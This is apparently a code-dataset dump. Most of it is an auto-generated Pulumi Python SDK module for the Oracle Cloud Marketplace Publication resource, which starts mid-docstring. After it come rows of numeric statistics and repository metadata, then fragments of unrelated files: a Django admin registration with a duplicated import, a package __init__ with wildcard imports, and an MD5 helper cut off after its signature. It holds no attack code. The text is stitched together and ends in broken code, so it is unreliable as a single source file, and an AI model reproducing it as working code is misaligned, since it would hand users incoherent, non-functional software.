(Updatable) The defined tags associated with this resource, if any. Each key is predefined and scoped to namespaces. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"Operations.CostCenter": "42"}`
"""
return pulumi.get(self, "defined_tags")
@defined_tags.setter
def defined_tags(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "defined_tags", value)
@property
@pulumi.getter(name="freeformTags")
def freeform_tags(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
(Updatable) The freeform tags associated with this resource, if any. Each tag is a simple key-value pair with no predefined name, type, or namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"Department": "Finance"}`
"""
return pulumi.get(self, "freeform_tags")
@freeform_tags.setter
def freeform_tags(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "freeform_tags", value)
@property
@pulumi.getter(name="longDescription")
def long_description(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) short description of the catalog listing
"""
return pulumi.get(self, "long_description")
@long_description.setter
def long_description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "long_description", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) The name of the contact.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@pulumi.input_type
class _PublicationState:
def __init__(__self__, *,
compartment_id: Optional[pulumi.Input[str]] = None,
defined_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
freeform_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
icon: Optional[pulumi.Input['PublicationIconArgs']] = None,
is_agreement_acknowledged: Optional[pulumi.Input[bool]] = None,
listing_type: Optional[pulumi.Input[str]] = None,
long_description: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
package_details: Optional[pulumi.Input['PublicationPackageDetailsArgs']] = None,
package_type: Optional[pulumi.Input[str]] = None,
short_description: Optional[pulumi.Input[str]] = None,
state: Optional[pulumi.Input[str]] = None,
support_contacts: Optional[pulumi.Input[Sequence[pulumi.Input['PublicationSupportContactArgs']]]] = None,
supported_operating_systems: Optional[pulumi.Input[Sequence[pulumi.Input['PublicationSupportedOperatingSystemArgs']]]] = None,
time_created: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering Publication resources.
:param pulumi.Input[str] compartment_id: (Updatable) The OCID of the compartment to create the resource within.
:param pulumi.Input[Mapping[str, Any]] defined_tags: (Updatable) The defined tags associated with this resource, if any. Each key is predefined and scoped to namespaces. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"Operations.CostCenter": "42"}`
:param pulumi.Input[Mapping[str, Any]] freeform_tags: (Updatable) The freeform tags associated with this resource, if any. Each tag is a simple key-value pair with no predefined name, type, or namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"Department": "Finance"}`
:param pulumi.Input['PublicationIconArgs'] icon: The model for upload data for images and icons.
:param pulumi.Input[bool] is_agreement_acknowledged: Acknowledgement that invoker has the right and authority to share this Community Image in accordance with their agreement with Oracle applicable to the Services and the related Service Specifications
:param pulumi.Input[str] listing_type: In which catalog the listing should exist.
:param pulumi.Input[str] long_description: (Updatable) short description of the catalog listing
:param pulumi.Input[str] name: (Updatable) The name of the contact.
:param pulumi.Input['PublicationPackageDetailsArgs'] package_details: A base object for the properties of the package
:param pulumi.Input[str] package_type: Type of the artifact of the listing
:param pulumi.Input[str] short_description: (Updatable) short description of the catalog listing
:param pulumi.Input[str] state: The state of the listing in its lifecycle
:param pulumi.Input[Sequence[pulumi.Input['PublicationSupportContactArgs']]] support_contacts: (Updatable) Contact information to use to get support from the publisher for the listing.
:param pulumi.Input[Sequence[pulumi.Input['PublicationSupportedOperatingSystemArgs']]] supported_operating_systems: List of operating systems supprted.
:param pulumi.Input[str] time_created: The date and time this publication was created, expressed in [RFC 3339](https://tools.ietf.org/html/rfc3339) timestamp format. Example: `2016-08-25T21:10:29.600Z`
"""
if compartment_id is not None:
pulumi.set(__self__, "compartment_id", compartment_id)
if defined_tags is not None:
pulumi.set(__self__, "defined_tags", defined_tags)
if freeform_tags is not None:
pulumi.set(__self__, "freeform_tags", freeform_tags)
if icon is not None:
pulumi.set(__self__, "icon", icon)
if is_agreement_acknowledged is not None:
pulumi.set(__self__, "is_agreement_acknowledged", is_agreement_acknowledged)
if listing_type is not None:
pulumi.set(__self__, "listing_type", listing_type)
if long_description is not None:
pulumi.set(__self__, "long_description", long_description)
if name is not None:
pulumi.set(__self__, "name", name)
if package_details is not None:
pulumi.set(__self__, "package_details", package_details)
if package_type is not None:
pulumi.set(__self__, "package_type", package_type)
if short_description is not None:
pulumi.set(__self__, "short_description", short_description)
if state is not None:
pulumi.set(__self__, "state", state)
if support_contacts is not None:
pulumi.set(__self__, "support_contacts", support_contacts)
if supported_operating_systems is not None:
pulumi.set(__self__, "supported_operating_systems", supported_operating_systems)
if time_created is not None:
pulumi.set(__self__, "time_created", time_created)
@property
@pulumi.getter(name="compartmentId")
def compartment_id(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) The OCID of the compartment to create the resource within.
"""
return pulumi.get(self, "compartment_id")
@compartment_id.setter
def compartment_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "compartment_id", value)
@property
@pulumi.getter(name="definedTags")
def defined_tags(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
(Updatable) The defined tags associated with this resource, if any. Each key is predefined and scoped to namespaces. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"Operations.CostCenter": "42"}`
"""
return pulumi.get(self, "defined_tags")
@defined_tags.setter
def defined_tags(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "defined_tags", value)
@property
@pulumi.getter(name="freeformTags")
def freeform_tags(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
(Updatable) The freeform tags associated with this resource, if any. Each tag is a simple key-value pair with no predefined name, type, or namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"Department": "Finance"}`
"""
return pulumi.get(self, "freeform_tags")
@freeform_tags.setter
def freeform_tags(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "freeform_tags", value)
@property
@pulumi.getter
def icon(self) -> Optional[pulumi.Input['PublicationIconArgs']]:
"""
The model for upload data for images and icons.
"""
return pulumi.get(self, "icon")
@icon.setter
def icon(self, value: Optional[pulumi.Input['PublicationIconArgs']]):
pulumi.set(self, "icon", value)
@property
@pulumi.getter(name="isAgreementAcknowledged")
def is_agreement_acknowledged(self) -> Optional[pulumi.Input[bool]]:
"""
Acknowledgement that invoker has the right and authority to share this Community Image in accordance with their agreement with Oracle applicable to the Services and the related Service Specifications
"""
return pulumi.get(self, "is_agreement_acknowledged")
@is_agreement_acknowledged.setter
def is_agreement_acknowledged(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "is_agreement_acknowledged", value)
@property
@pulumi.getter(name="listingType")
def listing_type(self) -> Optional[pulumi.Input[str]]:
"""
In which catalog the listing should exist.
"""
return pulumi.get(self, "listing_type")
@listing_type.setter
def listing_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "listing_type", value)
@property
@pulumi.getter(name="longDescription")
def long_description(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) short description of the catalog listing
"""
return pulumi.get(self, "long_description")
@long_description.setter
def long_description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "long_description", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) The name of the contact.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="packageDetails")
def package_details(self) -> Optional[pulumi.Input['PublicationPackageDetailsArgs']]:
"""
A base object for the properties of the package
"""
return pulumi.get(self, "package_details")
@package_details.setter
def package_details(self, value: Optional[pulumi.Input['PublicationPackageDetailsArgs']]):
pulumi.set(self, "package_details", value)
@property
@pulumi.getter(name="packageType")
def package_type(self) -> Optional[pulumi.Input[str]]:
"""
Type of the artifact of the listing
"""
return pulumi.get(self, "package_type")
@package_type.setter
def package_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "package_type", value)
@property
@pulumi.getter(name="shortDescription")
def short_description(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) short description of the catalog listing
"""
return pulumi.get(self, "short_description")
@short_description.setter
def short_description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "short_description", value)
@property
@pulumi.getter
def state(self) -> Optional[pulumi.Input[str]]:
"""
The state of the listing in its lifecycle
"""
return pulumi.get(self, "state")
@state.setter
def state(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "state", value)
@property
@pulumi.getter(name="supportContacts")
def support_contacts(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['PublicationSupportContactArgs']]]]:
"""
(Updatable) Contact information to use to get support from the publisher for the listing.
"""
return pulumi.get(self, "support_contacts")
@support_contacts.setter
def support_contacts(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['PublicationSupportContactArgs']]]]):
pulumi.set(self, "support_contacts", value)
@property
@pulumi.getter(name="supportedOperatingSystems")
def supported_operating_systems(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['PublicationSupportedOperatingSystemArgs']]]]:
"""
List of operating systems supprted.
"""
return pulumi.get(self, "supported_operating_systems")
@supported_operating_systems.setter
def supported_operating_systems(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['PublicationSupportedOperatingSystemArgs']]]]):
pulumi.set(self, "supported_operating_systems", value)
@property
@pulumi.getter(name="timeCreated")
def time_created(self) -> Optional[pulumi.Input[str]]:
"""
The date and time this publication was created, expressed in [RFC 3339](https://tools.ietf.org/html/rfc3339) timestamp format. Example: `2016-08-25T21:10:29.600Z`
"""
return pulumi.get(self, "time_created")
@time_created.setter
def time_created(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "time_created", value)
class Publication(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
compartment_id: Optional[pulumi.Input[str]] = None,
defined_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
freeform_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
is_agreement_acknowledged: Optional[pulumi.Input[bool]] = None,
listing_type: Optional[pulumi.Input[str]] = None,
long_description: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
package_details: Optional[pulumi.Input[pulumi.InputType['PublicationPackageDetailsArgs']]] = None,
short_description: Optional[pulumi.Input[str]] = None,
support_contacts: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['PublicationSupportContactArgs']]]]] = None,
__props__=None):
"""
This resource provides the Publication resource in Oracle Cloud Infrastructure Marketplace service.
Creates a publication of the given type with an optional default package
## Example Usage
```python
import pulumi
import pulumi_oci as oci
test_publication = oci.marketplace.Publication("testPublication",
compartment_id=var["compartment_id"],
is_agreement_acknowledged=var["publication_is_agreement_acknowledged"],
listing_type=var["publication_listing_type"],
package_details=oci.marketplace.PublicationPackageDetailsArgs(
eulas=[oci.marketplace.PublicationPackageDetailsEulaArgs(
eula_type=var["publication_package_details_eula_eula_type"],
license_text=var["publication_package_details_eula_license_text"],
)],
operating_system=oci.marketplace.PublicationPackageDetailsOperatingSystemArgs(
name=var["publication_package_details_operating_system_name"],
),
package_type=var["publication_package_details_package_type"],
package_version=var["publication_package_details_package_version"],
image_id=oci_core_image["test_image"]["id"],
),
short_description=var["publication_short_description"],
support_contacts=[oci.marketplace.PublicationSupportContactArgs(
email=var["publication_support_contacts_email"],
name=var["publication_support_contacts_name"],
phone=var["publication_support_contacts_phone"],
subject=var["publication_support_contacts_subject"],
)],
defined_tags={
"Operations.CostCenter": "42",
},
freeform_tags={
"Department": "Finance",
},
long_description=var["publication_long_description"])
```
## Import
Publications can be imported using the `id`, e.g.
```sh
$ pulumi import oci:marketplace/publication:Publication test_publication "id"
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] compartment_id: (Updatable) The OCID of the compartment to create the resource within.
:param pulumi.Input[Mapping[str, Any]] defined_tags: (Updatable) The defined tags associated with this resource, if any. Each key is predefined and scoped to namespaces. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"Operations.CostCenter": "42"}`
:param pulumi.Input[Mapping[str, Any]] freeform_tags: (Updatable) The freeform tags associated with this resource, if any. Each tag is a simple key-value pair with no predefined name, type, or namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"Department": "Finance"}`
:param pulumi.Input[bool] is_agreement_acknowledged: Acknowledgement that invoker has the right and authority to share this Community Image in accordance with their agreement with Oracle applicable to the Services and the related Service Specifications
:param pulumi.Input[str] listing_type: In which catalog the listing should exist.
:param pulumi.Input[str] long_description: (Updatable) short description of the catalog listing
:param pulumi.Input[str] name: (Updatable) The name of the contact.
:param pulumi.Input[pulumi.InputType['PublicationPackageDetailsArgs']] package_details: A base object for the properties of the package
:param pulumi.Input[str] short_description: (Updatable) short description of the catalog listing
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['PublicationSupportContactArgs']]]] support_contacts: (Updatable) Contact information to use to get support from the publisher for the listing.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: PublicationArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
This resource provides the Publication resource in Oracle Cloud Infrastructure Marketplace service.
Creates a publication of the given type with an optional default package
## Example Usage
```python
import pulumi
import pulumi_oci as oci
test_publication = oci.marketplace.Publication("testPublication",
compartment_id=var["compartment_id"],
is_agreement_acknowledged=var["publication_is_agreement_acknowledged"],
listing_type=var["publication_listing_type"],
package_details=oci.marketplace.PublicationPackageDetailsArgs(
eulas=[oci.marketplace.PublicationPackageDetailsEulaArgs(
eula_type=var["publication_package_details_eula_eula_type"],
license_text=var["publication_package_details_eula_license_text"],
)],
operating_system=oci.marketplace.PublicationPackageDetailsOperatingSystemArgs(
name=var["publication_package_details_operating_system_name"],
),
package_type=var["publication_package_details_package_type"],
package_version=var["publication_package_details_package_version"],
image_id=oci_core_image["test_image"]["id"],
),
short_description=var["publication_short_description"],
support_contacts=[oci.marketplace.PublicationSupportContactArgs(
email=var["publication_support_contacts_email"],
name=var["publication_support_contacts_name"],
phone=var["publication_support_contacts_phone"],
subject=var["publication_support_contacts_subject"],
)],
defined_tags={
"Operations.CostCenter": "42",
},
freeform_tags={
"Department": "Finance",
},
long_description=var["publication_long_description"])
```
## Import
Publications can be imported using the `id`, e.g.
```sh
$ pulumi import oci:marketplace/publication:Publication test_publication "id"
```
:param str resource_name: The name of the resource.
:param PublicationArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(PublicationArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
compartment_id: Optional[pulumi.Input[str]] = None,
defined_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
freeform_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
is_agreement_acknowledged: Optional[pulumi.Input[bool]] = None,
listing_type: Optional[pulumi.Input[str]] = None,
long_description: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
package_details: Optional[pulumi.Input[pulumi.InputType['PublicationPackageDetailsArgs']]] = None,
short_description: Optional[pulumi.Input[str]] = None,
support_contacts: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['PublicationSupportContactArgs']]]]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = PublicationArgs.__new__(PublicationArgs)
if compartment_id is None and not opts.urn:
raise TypeError("Missing required property 'compartment_id'")
__props__.__dict__["compartment_id"] = compartment_id
__props__.__dict__["defined_tags"] = defined_tags
__props__.__dict__["freeform_tags"] = freeform_tags
if is_agreement_acknowledged is None and not opts.urn:
raise TypeError("Missing required property 'is_agreement_acknowledged'")
__props__.__dict__["is_agreement_acknowledged"] = is_agreement_acknowledged
if listing_type is None and not opts.urn:
raise TypeError("Missing required property 'listing_type'")
__props__.__dict__["listing_type"] = listing_type
__props__.__dict__["long_description"] = long_description
__props__.__dict__["name"] = name
if package_details is None and not opts.urn:
raise TypeError("Missing required property 'package_details'")
__props__.__dict__["package_details"] = package_details
if short_description is None and not opts.urn:
raise TypeError("Missing required property 'short_description'")
__props__.__dict__["short_description"] = short_description
if support_contacts is None and not opts.urn:
raise TypeError("Missing required property 'support_contacts'")
__props__.__dict__["support_contacts"] = support_contacts
__props__.__dict__["icon"] = None
__props__.__dict__["package_type"] = None
__props__.__dict__["state"] = None
__props__.__dict__["supported_operating_systems"] = None
__props__.__dict__["time_created"] = None
super(Publication, __self__).__init__(
'oci:marketplace/publication:Publication',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
compartment_id: Optional[pulumi.Input[str]] = None,
defined_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
freeform_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
icon: Optional[pulumi.Input[pulumi.InputType['PublicationIconArgs']]] = None,
is_agreement_acknowledged: Optional[pulumi.Input[bool]] = None,
listing_type: Optional[pulumi.Input[str]] = None,
long_description: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
package_details: Optional[pulumi.Input[pulumi.InputType['PublicationPackageDetailsArgs']]] = None,
package_type: Optional[pulumi.Input[str]] = None,
short_description: Optional[pulumi.Input[str]] = None,
state: Optional[pulumi.Input[str]] = None,
support_contacts: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['PublicationSupportContactArgs']]]]] = None,
supported_operating_systems: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['PublicationSupportedOperatingSystemArgs']]]]] = None,
time_created: Optional[pulumi.Input[str]] = None) -> 'Publication':
"""
Get an existing Publication resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] compartment_id: (Updatable) The OCID of the compartment to create the resource within.
:param pulumi.Input[Mapping[str, Any]] defined_tags: (Updatable) The defined tags associated with this resource, if any. Each key is predefined and scoped to namespaces. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"Operations.CostCenter": "42"}`
:param pulumi.Input[Mapping[str, Any]] freeform_tags: (Updatable) The freeform tags associated with this resource, if any. Each tag is a simple key-value pair with no predefined name, type, or namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"Department": "Finance"}`
:param pulumi.Input[pulumi.InputType['PublicationIconArgs']] icon: The model for upload data for images and icons.
:param pulumi.Input[bool] is_agreement_acknowledged: Acknowledgement that invoker has the right and authority to share this Community Image in accordance with their agreement with Oracle applicable to the Services and the related Service Specifications
:param pulumi.Input[str] listing_type: In which catalog the listing should exist.
:param pulumi.Input[str] long_description: (Updatable) short description of the catalog listing
:param pulumi.Input[str] name: (Updatable) The name of the contact.
:param pulumi.Input[pulumi.InputType['PublicationPackageDetailsArgs']] package_details: A base object for the properties of the package
:param pulumi.Input[str] package_type: Type of the artifact of the listing
:param pulumi.Input[str] short_description: (Updatable) short description of the catalog listing
:param pulumi.Input[str] state: The state of the listing in its lifecycle
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['PublicationSupportContactArgs']]]] support_contacts: (Updatable) Contact information to use to get support from the publisher for the listing.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['PublicationSupportedOperatingSystemArgs']]]] supported_operating_systems: List of operating systems supprted.
:param pulumi.Input[str] time_created: The date and time this publication was created, expressed in [RFC 3339](https://tools.ietf.org/html/rfc3339) timestamp format. Example: `2016-08-25T21:10:29.600Z`
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _PublicationState.__new__(_PublicationState)
__props__.__dict__["compartment_id"] = compartment_id
__props__.__dict__["defined_tags"] = defined_tags
__props__.__dict__["freeform_tags"] = freeform_tags
__props__.__dict__["icon"] = icon
__props__.__dict__["is_agreement_acknowledged"] = is_agreement_acknowledged
__props__.__dict__["listing_type"] = listing_type
__props__.__dict__["long_description"] = long_description
__props__.__dict__["name"] = name
__props__.__dict__["package_details"] = package_details
__props__.__dict__["package_type"] = package_type
__props__.__dict__["short_description"] = short_description
__props__.__dict__["state"] = state
__props__.__dict__["support_contacts"] = support_contacts
__props__.__dict__["supported_operating_systems"] = supported_operating_systems
__props__.__dict__["time_created"] = time_created
return Publication(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="compartmentId")
def compartment_id(self) -> pulumi.Output[str]:
"""
(Updatable) The OCID of the compartment to create the resource within.
"""
return pulumi.get(self, "compartment_id")
@property
@pulumi.getter(name="definedTags")
def defined_tags(self) -> pulumi.Output[Mapping[str, Any]]:
"""
(Updatable) The defined tags associated with this resource, if any. Each key is predefined and scoped to namespaces. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"Operations.CostCenter": "42"}`
"""
return pulumi.get(self, "defined_tags")
@property
@pulumi.getter(name="freeformTags")
def freeform_tags(self) -> pulumi.Output[Mapping[str, Any]]:
"""
(Updatable) The freeform tags associated with this resource, if any. Each tag is a simple key-value pair with no predefined name, type, or namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"Department": "Finance"}`
"""
return pulumi.get(self, "freeform_tags")
@property
@pulumi.getter
def icon(self) -> pulumi.Output['outputs.PublicationIcon']:
"""
The model for upload data for images and icons.
"""
return pulumi.get(self, "icon")
@property
@pulumi.getter(name="isAgreementAcknowledged")
def is_agreement_acknowledged(self) -> pulumi.Output[bool]:
"""
Acknowledgement that invoker has the right and authority to share this Community Image in accordance with their agreement with Oracle applicable to the Services and the related Service Specifications
"""
return pulumi.get(self, "is_agreement_acknowledged")
@property
@pulumi.getter(name="listingType")
def listing_type(self) -> pulumi.Output[str]:
"""
In which catalog the listing should exist.
"""
return pulumi.get(self, "listing_type")
@property
@pulumi.getter(name="longDescription")
def long_description(self) -> pulumi.Output[str]:
"""
(Updatable) short description of the catalog listing
"""
return pulumi.get(self, "long_description")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
(Updatable) The name of the contact.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="packageDetails")
def package_details(self) -> pulumi.Output['outputs.PublicationPackageDetails']:
"""
A base object for the properties of the package
"""
return pulumi.get(self, "package_details")
@property
@pulumi.getter(name="packageType")
def package_type(self) -> pulumi.Output[str]:
"""
Type of the artifact of the listing
"""
return pulumi.get(self, "package_type")
@property
@pulumi.getter(name="shortDescription")
def short_description(self) -> pulumi.Output[str]:
"""
(Updatable) short description of the catalog listing
"""
return pulumi.get(self, "short_description")
@property
@pulumi.getter
def state(self) -> pulumi.Output[str]:
"""
The state of the listing in its lifecycle
"""
return pulumi.get(self, "state")
@property
@pulumi.getter(name="supportContacts")
def support_contacts(self) -> pulumi.Output[Sequence['outputs.PublicationSupportContact']]:
"""
(Updatable) Contact information to use to get support from the publisher for the listing.
"""
return pulumi.get(self, "support_contacts")
@property
@pulumi.getter(name="supportedOperatingSystems")
def supported_operating_systems(self) -> pulumi.Output[Sequence['outputs.PublicationSupportedOperatingSystem']]:
"""
List of operating systems supprted.
"""
return pulumi.get(self, "supported_operating_systems")
@property
@pulumi.getter(name="timeCreated")
def time_created(self) -> pulumi.Output[str]:
    """
    The date and time this publication was created, expressed in [RFC 3339](https://tools.ietf.org/html/rfc3339) timestamp format. Example: `2016-08-25T21:10:29.600Z`
    """
    return pulumi.get(self, "time_created")
| 52.339877
| 369
| 0.678857
| 4,796
| 42,657
| 5.828399
| 0.059008
| 0.072014
| 0.062534
| 0.037778
| 0.912746
| 0.891532
| 0.868279
| 0.843988
| 0.830787
| 0.803384
| 0
| 0.00357
| 0.218651
| 42,657
| 814
| 370
| 52.404177
| 0.835104
| 0.399301
| 0
| 0.652273
| 1
| 0
| 0.150318
| 0.058916
| 0
| 0
| 0
| 0
| 0
| 1
| 0.163636
| false
| 0.002273
| 0.015909
| 0
| 0.279545
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8ec100d59f8371937781ae3ee5ca759179729bdc
| 132
|
py
|
Python
|
pokemon/admin.py
|
pgrimaud/django-pokedex
|
002acb0aaca899f0069d3b41e35a1d87472d508c
|
[
"MIT"
] | null | null | null |
pokemon/admin.py
|
pgrimaud/django-pokedex
|
002acb0aaca899f0069d3b41e35a1d87472d508c
|
[
"MIT"
] | null | null | null |
pokemon/admin.py
|
pgrimaud/django-pokedex
|
002acb0aaca899f0069d3b41e35a1d87472d508c
|
[
"MIT"
] | 1
|
2019-12-11T09:49:46.000Z
|
2019-12-11T09:49:46.000Z
|
"""Django admin registration for the pokemon app."""
from django.contrib import admin

from pokemon.models import Pokemon

# Expose the Pokemon model in the Django admin site.
# (The original file imported django.contrib.admin twice; the duplicate
# import has been removed.)
admin.site.register(Pokemon)
| 18.857143
| 34
| 0.833333
| 19
| 132
| 5.789474
| 0.473684
| 0.181818
| 0.309091
| 0.418182
| 0.545455
| 0.545455
| 0
| 0
| 0
| 0
| 0
| 0
| 0.113636
| 132
| 6
| 35
| 22
| 0.940171
| 0
| 0
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.75
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
d903b2ad7cce75d115243551b660f19ca770ca55
| 172
|
py
|
Python
|
src/nlpertools/__init__.py
|
lvzii/nlpertools
|
4908433d1e5b1f5b0b756da5aad78b2926465007
|
[
"MIT"
] | 1
|
2022-03-10T02:54:30.000Z
|
2022-03-10T02:54:30.000Z
|
src/nlpertools/__init__.py
|
lvzii/nlpertools
|
4908433d1e5b1f5b0b756da5aad78b2926465007
|
[
"MIT"
] | null | null | null |
src/nlpertools/__init__.py
|
lvzii/nlpertools
|
4908433d1e5b1f5b0b756da5aad78b2926465007
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python3.8
# -*- coding: utf-8 -*-
# @Author : youshu.Ji
from .baseio.OTHER import *
from .baseio.FILEIO import *
from .baseio.DIR import *
from .baseml import *
| 24.571429
| 28
| 0.674419
| 25
| 172
| 4.64
| 0.64
| 0.258621
| 0.275862
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.020548
| 0.151163
| 172
| 7
| 29
| 24.571429
| 0.773973
| 0.360465
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
d916b106bb189cbc9df19e98e69a1bf08f5cea18
| 95
|
py
|
Python
|
py-cmpp/utils/encode_util.py
|
zpk2017/py-cmpp
|
d089e08f7f06a7e223024c0a6789ad9f5cf6ec32
|
[
"MIT"
] | 5
|
2020-04-24T07:01:46.000Z
|
2021-06-27T17:59:58.000Z
|
py-cmpp/utils/encode_util.py
|
zpk2017/py-cmpp
|
d089e08f7f06a7e223024c0a6789ad9f5cf6ec32
|
[
"MIT"
] | 1
|
2021-01-05T02:45:01.000Z
|
2021-01-05T02:45:01.000Z
|
py-cmpp/utils/encode_util.py
|
zpk2017/py-cmpp
|
d089e08f7f06a7e223024c0a6789ad9f5cf6ec32
|
[
"MIT"
] | 3
|
2020-07-21T05:09:02.000Z
|
2021-10-20T06:46:14.000Z
|
import hashlib
def get_md5_digest(source_data):
